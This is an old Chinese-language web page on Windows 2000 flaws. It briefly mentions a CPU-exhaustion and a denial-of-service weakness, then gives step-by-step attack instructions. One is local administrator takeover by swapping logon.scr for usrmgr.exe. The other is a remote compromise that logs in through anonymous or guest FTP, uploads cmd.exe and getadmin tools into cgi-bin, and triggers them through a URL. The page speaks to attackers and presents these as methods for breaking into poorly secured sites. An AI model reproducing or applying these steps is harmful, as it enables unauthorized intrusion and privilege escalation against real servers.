WIN2000漏洞
/ns/ld/win/data/20010108024518.htm
在Windows 2000远程服务器上的cpu过载
---------------------------------
发送一连串的二进制中的0字符,到达Windows 2000中的任意一个端口,都可能引起CPU的利用率达到100%。这样的端口包括了TCP中端口号为7,9,21,23,7778和UDP中端口号为53,67,68,135,500,1812,1813,2535,3456的这些端口。
在Windows 2000远程服务器上的DOS操作系统的漏洞
------------------------------------------
以Windows 2000作为操作平台的服务器作为远程控制台对远程访问进行控制。一个远程的攻击者向该服务器发了一连串的攻击性代码,使服务器工作出现故障。在此之后,如果系统通过自动重启后继续工作,那么很多 的攻击造成了远程服务器不断的重新启动,直到重启的频度超出了系统的承受能力,系统崩溃。
如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号:
-----------------------------------------
先把c:\winnt\system32下的logon.scr改名为logon.old备份
然后把usrmgr.exe改名为logon.scr
然后重新启动
logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界面,而是用户管理器
这时他就有权限把自己加到Administrator组
不要忘记把文件名改回来啊!
2.
下面的技术适用于不重视NT网络安全的网站,
一些http的技术也可以供较高级的人员参考
进入Win2K网络可以采取下面的步骤:
因为NT的IIS server的ftp一般都是允许anonymous匿名帐号进入的,有些anonymous的帐号还有upload权限,我们就要攻击这类站点。因为如果不允许匿名帐号,就可能造成明文密码在网上传输。用tcpspy的工具可以截获这 些密码。现在不谈这些比较高级的技术。
正因为允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server,比如:xxx.xxx.xxx.xxx(示例名):
ftp xxx.xxx.xxx.xxx
Connected to xxx.xxx.xxx.xxx
220 2000svr Microsoft FTP Service (Version 5.0).
2000svr这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSER_2000svr的用户帐号,属于Domain user组,这个帐号我们以后要用来获取Administrator的权限
User (xxx.xxx.xxx.xxx none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 输入 guest@ 或者guest
对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号,虽然只属于Domain guest组
在这种情况下我们就可以进NT server的ftp了。
现在,开始查找cgi-bin目录(或者scripts目录),进去以后,
把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin
然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN
大约十多秒后屏幕显示:
CGI Error
这时有90%的可能是:你已经把IUSER_2000svr升级为Administrator,也就是任何访问该web站的人都是管理员